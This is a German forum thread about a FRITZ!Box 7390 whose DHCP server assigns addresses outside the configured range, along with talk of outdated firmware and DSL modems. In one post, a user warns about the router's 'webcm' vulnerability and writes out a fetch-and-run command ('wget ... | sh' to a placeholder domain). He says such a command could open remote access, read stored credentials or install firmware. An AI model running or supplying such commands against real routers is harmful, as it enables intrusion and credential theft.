[Problem] 7390 vergibt IPs außerhalb des angegebenen Bereiches

svenson1

Neuer User
Punkte für Reaktionen
0
Hallo,

ich habe mit meiner 7390 (FW 84.05.05) ein großes Problem mit dem DHCP Server. DHCP ist eigentlich immer deaktiviert gewesen, weil ich die IPs im Netzwerk selbst vergeben habe. Jetzt habe ich mir Sonos Lautsprecher gegönnt und bin auf DHCP angewiesen. Ich habe es also in der FB aktiviert und einen IP-Bereich (192.168.2.200 - 192.168.2.220) angegeben, wo noch keine Nummer vergeben ist.
Das hat auch beim Einrichten funktioniert (wobei ich nicht genau weiss, welche IPs die Boxen da bekommen haben). Nach einem Neustart des Routers hat dieser den Boxen IPs zugewiesen, die außerhalb des angegebenen Bereiches liegen. Es gab sogar eine mehrfachvergabe von IPs, weil er die selben verwendet hat, die ich meinen Rechnern fest vergeben habe.

Wie kann das sein, dass die Fritzbox IPs vergibt die außerhalb meines angegeben Bereiches liegen?

Guten Rutsch!
Sven

Welche Gültigkeit der IPs in Tagen hast du eingestellt unter "IPv4-Einstellungen" ?

Meinst du hier?

7390_sc1.jpg

Was anderes habe ich nicht in meiner FW.

Glaube ich nicht.
Unter Heimnetz schon mal geschaut ?

-----------------

Sorry, nicht vorhanden bei deinen FWs der beide FBs.

http://avm.de/service/downloads/download/show/14613/

ftp://service.avm.de/Downgrade/FRITZ!Box_7390/deutsch_a-ch/7390_6.05/7390_6.05_de_info.txt

"...
NEU - Gültigkeitsdauer der von FRITZ!Box vergebenen IPv4-Adressen einstellbar (DHCP lease time)
..."

-----------------

@MuP: Seine Firmware ist so alt, da gibt es die Einstellung für die Lease-Time noch gar nicht.
Ja Danke, hatte mich auch überrascht.

Zuletzt bearbeitet:
@svenson1:
Ich drücke Dir zwar die Daumen, daß sich noch jemand so weit zurückerinnern kann, daß er die Funktionsweise des DHCP-Servers in der AVM-Firmware vor 3,5 Jahren noch rekapitulieren kann ... aber solltest Du nicht erst einmal selbst die verschiedenen AVM-Dateien mit den Beschreibungen der inzwischen korrigierten Fehler durchsuchen, bevor sich jemand anderes am Ende die Mühe macht, das an Deiner Stelle zu tun ?

Und auch wenn Du Deine FRITZ!Box über LAN1 hinter einem "Modem" (das zu allem Überfluß auch noch eine weitere FRITZ!Box mit uralter Firmware ist) sicher wähnst, weil Du event. keinen Fernzugriff darauf konfiguriert hast ... die wirklich dringende Empfehlung für ein Update der Firmware kann ich mir nicht verkneifen. Ob Du sie am Ende ignorierst, das ist zweifellos Deine Sache ... aber ich hoffe ganz stark, daß sich niemand ein Beispiel an Dir und dem Updatestand Deiner Geräte nimmt, wenn ich von einer korrekten Angabe in der Signatur ausgehe.

Auch Dir einen guten Rutsch und ein "unfallfreies" 2015 ...

@MuP:
Seine Firmware ist so alt, da gibt es die Einstellung für die Lease-Time noch gar nicht.

nein gibt es nicht. Sieht so aus...
7390_sc2.jpg

Du kannst auch schrittweise vorgehen.
Alle Netzwerkteilnehmer auschalten, löschen, dann Stück für Stück einschalten.
Wenn der erste Teilnehmer eine "saubere" IP bekommen hat, editierst du die Netzwerkeinstellung mit Anhaken von "Diese IP immer zuweisen"
(wenn das damals bei deinen FWs schon funktionierte).
Dann den nächsten Teilnehmer einschalten ...

@PeterPawn
oohhh... du hast soo.... recht, aber auch so was von so recht, ich kann dir gar nicht sagen wie viel recht du hast.... Und ich weiss bestimmt am besten, was für eine sch**** uralte FW ich habe. Ich weiss aber auch, was für einen sensiblen DSL Anschluss ich von der Telekom bekommen habe. An diesem ADSL Anschluss laufen leider nur die uralten AVM Router/Modems am besten.
Nun aber mal Ignoranz und Spott bei Seite...., die alte FW hat nur diesen Grund - eine stabile DSL Verbindung. Mit dem Modem der 7390 ist das an meinem Anschluss nicht möglich. Deshalb das ext. Modem der 7240 welches mir sicher die 2MB/s garantiert.
Vor einem Jahr habe ich mir die Mühe gemacht auf die 7390 die aktuelle Labor FW geflasht, um auf die 2. Modemfritzbox eventuell zu verzichten. Aber leider war da die DSL-Verbindung genau so schlecht wie am Anfang.

In diesem Thread haben wir damals wenigstens die 7390 zu einem externen Modem überreden können.....
http://www.ip-phone-forum.de/showthread.php?t=238636

Zuletzt bearbeitet:
@svenson1:
Ich wollte/will Dir nicht auf den Zeiger gehen und kann auch mit Spott notfalls ganz gut umgehen ... aber inhaltliche Fehler (und selbst wenn sie dreist nur in meinen Augen existieren) in solchen Aussagen kann ich - Charakterfehler - nicht unwidersprochen lassen.

Solange die 7240 die DSL-Verbindung macht, sehe ich den Grund nicht, warum auch der Router auf der Version 06.05 "verharren" muß. Bitte erläutere mir doch dafür mal den technischen Hintergrund, es wird ja hoffentlich nicht daran liegen, daß die Versionen auf beiden Geräten "so gut zueinander passen" ?

Wenn Du Dir wirklich der Risiken auch jederzeit bewußt bist (genauso wie alle anderen ggf. im Haushalt lebenden und die Internet-Verbindung über die Boxen benutzenden Personen), daß die Geräte wirklich extrem leicht anzugreifen sind (es reicht eine im Browser eingebettete Werbung und selbst mit einem hier plazierten Link zu einer - angeblichen - Beschreibung für die Lösung Deines Problems würde ich mir immer noch gute Chancen für einen Angriff ausrechnen) und Du wirklich jede Web-Verbindung (für jedes Image usw.) Deines Browsers akribisch prüfst ... dann kann Dir auch keiner etwas anhaben. Und vor so viel Selbstdisziplin und (digitaler) Askese ziehe ich dann den Hut ...

Nun aber mal Ignoranz und Spott bei Seite...., die alte FW hat nur diesen Grund - eine stabile DSL Verbindung.
Das ist natürlich voll am Thema vorbei, denn deine "Fritz!Box 7390 FW 84.05.05, Internet über LAN1" macht ja gar nicht die DSL-Verbindung.

@KunterBunter
richtig, die 7390 macht nicht die Internetverbindung. ABER die 7390 akzeptierte kein externes Modem (Telekom Anschluss mit VLAN Tags) ohne die Anpassung des Wertes tcom_targetarch = no in der Datei ar7.cfg. Diese Datei konnte aber in den neueren FWs der 7390 nicht mehr angepasst werden. Deshalb ist meine 7390 immer noch auf 84.05.05.

In diesem Thread haben wir damals wenigstens die 7390 zu einem externen Modem überreden können.....
Der alte Sinnspruch "Never touch a running system." ist nur begrenzt gültig. Mit moderner Firmware ist es - ich sag mal vorsichtshalber: meines Wissens, auch wenn ich da schon die eine oder andere Hand im Feuer riskieren würde - überhaupt kein Problem mehr, eine FRITZ!Box 7390 auch mit einem externen Modem so zu betreiben, daß die FRITZ!Box dann die PPPoE-Einwahl macht ... solange das vorgeschaltete "Modem" transparent ist und die Daten 1:1 vom DSLAM durchreicht, ist das ja nicht nur bei Dir in dieser Konfiguration anzutreffen.

Ich suche ja sonst gerne mehr theoretisch nach den Sicherheitslücken ... bei Dir würde mich glatt ein Angriff als PoC mal reizen, wenn Du mich explizit dazu autorisierst (das wäre dann aber richtig mit Ausdruck, eindeutiger Identifikation und eigenhändiger Unterschrift erforderlich).

Einfach mal um zu zeigen, wie leicht so etwas - bei der wohlbekannten webcm-Lücke - zu realisieren ist und daß der abgeschaltete Fernzugriff da nur ein geringes Hindernis ist ... bei bekannter Firmware-Version ist ein "tailored access" über ein untergeschobenes "wget -qO - http://meinedomain.de/7390_0505 | sh" bereits erledigt, das kann über jeden beliebigen Link erfolgen, wenn die im Link angegebene URL von einem Browser automatisch geladen/aufgerufen wird, wie es bei Images, div. Sound- und Video-Dateien, Javascript-Dateien und sogar "Cascading Style Sheets" von so ziemlich jedem modernen Browser auch gemacht wird.

Je nachdem, was man dann in der Datei 7390_0505 an eigenen Kommandos unterbringt, kann man den externen Zugriff auf die Box freischalten (einfacher ctlmgr_ctl-Aufruf), die hinterlegten "Credentials" auslesen oder - das wäre der Extremfall - gleich eine passende eigene Firmware auf die Box bringen.

Mit so einer Lücke ist eben nicht zu spaßen und wenn man so etwas sehenden Auges als Risiko akzeptiert, hat man hoffentlich hinterher auch die Größe, auf das Jammern zu verzichten, wenn das Kind dann in den Brunnen gefallen ist ... ich hoffe das jedenfalls.

EDIT:
Die Aussage
Diese Datei konnte aber in den neueren FWs der 7390 nicht mehr angepasst werden.
ruft sicherlich in diesem Forum auch nur schallendes Gelächter hervor. Wenn Du wirklich dieser Meinung sein solltest, kann/will ich Dir auch nicht mehr helfen ... mach was Du willst, ich sehe ohnehin keine Chance mehr, Dich von irgendetwas zu überzeugen, da Dein Weltbild (gerade bzgl. der FRITZ!Boxen) offenbar mit "gefestigt" noch sehr wohlwollend umschrieben ist.

Zuletzt bearbeitet:
ok, meine 7390 bekommt noch dieses Jahr die neuste FW. Das damit das Problem der doppelten IP Vergabe bereinigt ist, was ja eigentlich mein Problem war, bin ich überzeugt. Aber das die 7390 mit aktueller FW eine stabile DSL-Verbindung mit maximaler Datenrate zustande bringt, davon lasse ich mich gern überzeugen.

Aber das die 7390 mit aktueller FW eine stabile DSL-Verbindung mit maximaler Datenrate zustande bringt, davon lasse ich mich gern überzeugen.
Das klingt ja nach einem Erfolg der "Überzeugungsarbeit", dann lohnt sich sicherlich auch die weitere sachliche Diskussion.

Daß die 7390 gleichzeitig auch die DSL-Verbindung machen soll, hat hier eigentlich niemand explizit geschrieben ... Deine Konstruktion mit der 7240 als Modem hat ja mit der Firmware-Version des Routers nur wenig bis nichts zu tun.

Nachdem es immer wieder Diskussionen zu erheblichen Unterschieden in der Qualität der verbauten Line-SoCs gibt und ich selbst keine so grenzwertige Leitung kenne, daß ein Test dort Sinn machen würde, kann und will ich mich dazu auch nicht festlegen.

Es mag sein, daß die 7390 (wahrscheinlich eher sogar viele bis alle VDSL-fähigen Modelle) an schlechten ADSL-Leitungen keine gute Figur macht (ich hätte eine 7270v1 im Angebot, die soll ein recht gutes Modem haben) und deshalb der Betrieb einer potenten Box als Router hinter einem guten Modem das Mittel der Wahl ist. Das zu bestreiten wäre dumm ... aber der von Dir postulierte Zusammenhang zwischen der 7390-Version und der Möglichkeit des Betriebs mit externem Modem am T-Com-DSL-Anschluß (auch mit VLAN-Tagging) besteht eben auch schon sehr lange nicht mehr (schon die 05.21 konnte das, wenn ich mich richtig erinnere, aber das behaupte ich auch nur mit dem notwendigen Vorbehalt).

Du hast mit Sicherheit ein komplett falsches Bild von mir ;-( denn ich bin einer der neuere Versionen eigentlich nicht erwarten kann. Deshalb bin ich auch mit dem Umstand, das mein DSLAM 5km entfernt ist sehr unzufrieden. Das ich dann ein stabiles System mit der 7390 und der 7240 hinbekommen habe war ich sehr froh.
Das es nun so ist, dass ich könnte die 7390 auf den aktuellen FW stand bringen erfreut mich sehr und der download läuft schon. Ich werden die 7390 als erstes als Modem probieren und wenn das nichts wird wieder hinter der 7240.

Es wäre schön, wenn es so wäre....
Nochmal Guten Rutsch!

Du hast mit Sicherheit ein komplett falsches Bild von mir ;-(
Das ist nicht weiter tragisch ... solange ich nur ein falsches Bild von Dir habe und Du nicht eine Telefonrechnung > 2000 EUR, ist das sicherlich die bessere Variante.

Ich war ja am Beginn auch nicht ganz sachlich, einfach weil ich beim ersten Lesen der Versionsnummer für die 7390 mehr an einen Schreibfehler (06.05 anstelle 05.05) gedacht hatte und es mich beim Lesen der Signatur (bei einem IPPF-Member) wirklich fast vom Stuhl gehauen hat, als ich das dann langsam als richtig erkennen mußte.

Es ist nun mal leider so, daß es "da draußen" immer noch genug verwundbare Boxen gibt, bei denen die Besitzer schlicht keine Ahnung und keinen Plan haben (mit etwas Glück finden sie das Gerät noch in der Wohnung) ... aber daß jemand die Verwendung der verwundbaren Versionen noch verteidigt (außer als "Honeypot"), das konnte/wollte ich mir nicht vorstellen. Insofern hast Du mich anfangs wirklich erschüttert ... das ist aber nach #13 wieder im Lot. ;)

... das ist aber nach #13 wieder im Lot. ;)

und so soll es auch sein - alles gut!

Ich habe nun auf meiner 7390 die neuste FW 06.20 (über FW-Update der Fritzbox) installiert. Eine Internetverbindung mit dem externen Modem kam nicht zu stande (PPPoE-Fehler: Zeitüberschreitung).
Da habe ich jetzt die 7390 als Modem verwendet (um überhaupt wieder eine Verbindung zu haben). Und was soll ich sagen...., sie hat sich genau so gesynct wie die 7240 (down: 2304kbit/s; up: 448kbit/s), CRC-Error war 1ner in den letzten 15min.
Ich lasse es jetzt erst einmal so - das wäre natürlich super cool, wenn ich auf das externe Modem verzichten könnte ;-)

Gesundes Neues!!!

Soo... es ist ernüchternd - ich bin auf den Boden der Realität zurückgekehrt. Der Glücksmoment hat leider nicht lange angehalten und ich weiss jetzt, warum ich das System so belassen hatte wie es stabil war.

- die FB hat nach 3h ihren ersten resync hinter sich mit dem Ergebnis 1,7Mbit/s statt 2,3Mbit/s. Nach einem Neustart bin ich jetzt bei 1,4Mbit/s :-(

- Als Wlan-Repeater im "alten" System hatte ich eine FB 7071. Nach dem Aktualisieren der FW meiner Basisstation 7390 konnte ich diese nicht mehr verwenden. Ich hatte ja aber, die als ehemaliges Modem verwendete 7240. Nach einer Aktualisierung de FW kann ich nun diese als Repeater verwenden - ich habe sie aber eben nicht mehr als Modem :-(

- Zum eigentlichen Problem der IP-Zuweisung..... Bei dem Fritzbox-Repeater 7240 kann keine feste IP mehr vergeben werden. Ich musste also bei meinem Router (7390) den DHCP aktivieren. Da ich das für meine Sonos Lautsprecher sowieso brauche, habe ich damit kein Problem. Also Adressbereich 200 bis 210 aktiviert. Der Repeater hat auch gleich die 200 erhalten und war auch darüber im Netzwerk zu erreichen. Habe ich auch gleich das Häckchen gesetzt, dass er immer diese IP bekommt.
Nun habe ich mich gefreut meine Sonos wieder einzurichten. Beim Blick in den Router glaubte ich meinen Augen kaum - der Repeater hat plötzlich die IP 104 und bei meinem iMac poppt plötzlich ein Fenster auf, dass im Netzwerk jemand die selbe IP 103 verwendet - das sind die Sonos :-(

@PeterPawn
bitte nicht wieder hauen....., aber es ist vlt. manchmal doch besser beim Altbewährtem zu bleiben.
Ich möchte das aber ganz ruhig und sachlich aufarbeiten und ein Downgrade soll es nicht werden. Zu was kannst du mir raten? Ich wollte eigentlich mal die 7490 an meinem Anschluss testen, da ich von verschiedenen Quellen gehört habe, das sie wieder ein ADSL verträglicheres Modem haben soll. Kann das jemand bestätigen?

Ich haue grundsätzlich niemanden (mehr) ... wenn da dann kein Gras mehr wächst, kriege ich Ärger mit Öko-Aktivisten.

Ich bin etwas irritiert, nach welchem System die FRITZ!Box da Deiner Meinung nach als DHCP-Server falsch vorgehen soll.

Wenn Du 200-210 aktivierst und die Box weist ab 103 zu (so verstehe ich die Adresse der Lautsprecher und des Repeaters), dann ist das ja am Ende auch absolut willkürlich. Entweder die 7390 hat noch ein "Restgedächtnis" für schon einmal "gesehene" Clients oder sie ist es am Ende dann doch nicht, die da die falschen Adressen zuweist. Wieso sollte sie ausgerechnet auf so einer krummen Adresse starten ? Der "Normalfall" (wenn Deine Einstellungen wirklich ignoriert würden) wäre die Vergabe ab .20 als erste Adresse in der Range. Da finde ich dann Dein Problem schon wieder etwas exotisch, denn ein ähnlicher Fehler in aktueller Firmware wäre sicherlich schon einige Male aufgefallen. Bis auf die teilweise falsche Zuordnung von Links in der Netzwerkübersicht (für Geräte, die auf Port 80 einen TCP-Dienst bereithalten) ist da aber m.W. für die 06.20 (das ist das aktuelle Release, in der Laborversion sollte sogar diese "Macke" behoben sein) nichts weiter bekannt.

Schau Dir mal die Support-Daten an ... neben dem DHCP-Problem findest Du da u.U. auch gleich noch die Informationen, warum die 7390 überhaupt einen Resync hingelegt hat. Solange da nicht massiv die Anzahl der nicht korrigierbaren Fehler auf der DSL-Strecke steigt, hat sie ja eigentlich keinen Grund, ihrerseits neu in Verhandlungen einzutreten.

Mit hoher Wahrscheinlichkeit wirst Du aber die entscheidenden Informationen auf der DSL-Seite bei Deinem Neustart "vernichtet" haben. Vielleicht warst Du aber auch vorausschauend genug, diese vor dem Neustart doch noch zu sichern ?

Wenn die 7390 ein "Gedächtnis" entwickelt haben sollte, kannst Du ihr das auf der Kommandozeile mit wenig Aufwand austreiben ... allerdings müßte man dazu wissen, was bei Dir genau im Rahmen der Lobotomie für die Box zu entsorgen wäre, das ist wieder ein Fall für die Supportdaten. Die aber bitte nicht im Ganzen (zumindest nicht hier) anhängen ... neben den benötigten Informationen sind da noch jede Menge "private" Sachen enthalten, die über das "SECRET" von AVM hinausgehen.

Das Problem "WDS" vs. "WLAN-Repeater" hattest Du am Beginn auch nicht erwähnt, es gibt - m.W.(!), ich lege die Hand dafür aber nicht ins Feuer - auch von AVM noch eine "alte" Firmware mit WDS, wo die webcm-Lücke trotzdem behoben ist. Ob die dann auch bei Deinen DHCP-Problemen helfen würde (wenn die überhaupt von der FRITZ!Box ausgehen), weiß ich aber natürlich auch nicht.

Zu der Frage des "besten ADSL-Modems" gibt es ja diverse Threads hier ... da aber eine grenzwertige ADSL-Leitung sich auch jedesmal anders darstellen kann, bin ich eher ein Gegner solcher Diskussionen (bzw. ein uninteressierter Leser bei großer Langeweile). Es gibt sicherlich Geräte, die wirklich Schrott sind und immer schlechter arbeiten als andere ... aber aus der Tatsache, daß eine Box an einem Anschluß die besten Werte liefert, kann man imho noch lange nicht schließen, daß das an einem beliebigen anderen Anschluß genauso wäre oder ist. Nicht einmal die identischen Werte zweier baugleicher Boxen sind am Ende garantiert. Es ist immer eine Frage der Aushandlung der konkreten Leitungseigenschaften und auch die sind ggf. über den Tag schwankend (z.B. durch Übersprechen aus anderen Verbindungen, was dann i.d.R. auch wieder abhängig von der Tageszeit ist -> abends i.d.R. höhere Nutzung als am Tage). Wenn es sich um ein einmaliges "Einmessen" einer Leitung handeln würde und ansonsten immer dieselben physikalischen Bedingungen vorliegen würden, wäre die gesamte Aushandlung ja unnötig. Das Verfahren wurde ja gerade so gewählt, daß es sich an unterschiedliche Bedingungen anpaßt. Wenn dann einer oder mehrere Deiner Nachbarn (deren Leitungen in demselben Kabelbündel liegen wie Deine) zum Zeitpunkt der Aushandlung der Verbindung gerade richtig Verkehr machen, dann kommen u.U. eben schlechtere Werte dabei heraus. Dafür sollten diese dann aber auch das untere Limit bilden.

Ich verstehe aber, daß man bei einer schlechten Leitung das letzte Bit herauskitzeln will (solange man sie dann benutzt, wenn es kein anderer macht) ... aber die Langzeitstabilität (bzw. der wirklich erzielte Durchsatz inkl. aller wiederholten Pakete wg. nicht korrigierbarer Fehler - die per FEC behobenen schmälern den realen Durchsatz ja wenig bis gar nicht) sollte man dabei dann auch nicht aus dem Auge lassen (meine Meinung).

Wenn es wirklich am Modem liegt, such Dir das beste bei Dir passende Modem und setze es vor die FRITZ!Box. Wenn es am Ende aber nur um eine angezeigte "maximale Bandbreite" geht und die bei realen Datenübertragungen wegen häufiger Wiederholungen (besonders zu den "Stoßzeiten") dann ohnehin nicht erreicht wird bzw. da dann die Fehleranzahl so ansteigt, daß am Ende sogar weniger Durchsatz übrig bleibt als bei der "sicheren" Variante, dann könntest Du noch probieren, von der FRITZ!Box initiierte neue Aushandlungen der Verbindung zu unterdrücken; dann hast Du eben bei Bursts entsprechende Probleme, aber am Ende die Chance, bei freier Leitung (oder was auch sonst immer die Parameter Deiner Leitung verschlechtern mag) mit höherem Durchsatz zu arbeiten. Es gibt da diverse Einstellmöglichkeiten für die DSL-Kommunikation bei der 7390, ob eine davon (dsl_isp_tool/dsl_monitor) eine "Neuverhandlung" seitens der FRITZ!Box unterdrücken kann, mußte ich glücklicherweise noch nie selbst testen und kann ich daher auch nur vermuten.

In Post #6 ist kein Häkchen für aktives DHCP gesetzt. Ich würde die 7240 nochmal zurücksetzen, DHCP deaktivieren und dann die Box als Repeater konfigurieren. Standardmäßig ist DHCP bei Werkseinstellung aktiv. Es scheint auch hintergründig im Repeater-Modus aktiv zu sein. Bei mir werkelt auch eine 7390 zuverlässig mit aktiven DHCP. Was spricht dagegen, deine Clients auch auf DHCP umzustellen? Dann gibt es keine Doppelbelegung.
Die 7390 hat ein "Zwitter-Modem" (ADSL/VDSL) Daher macht sie leider keine gute Figur an ADSL-Anschlüssen.

Kostenlos!

Statistik des Forums

Themen
248,901
Mitglieder
378,601
Neuestes Mitglied
Midares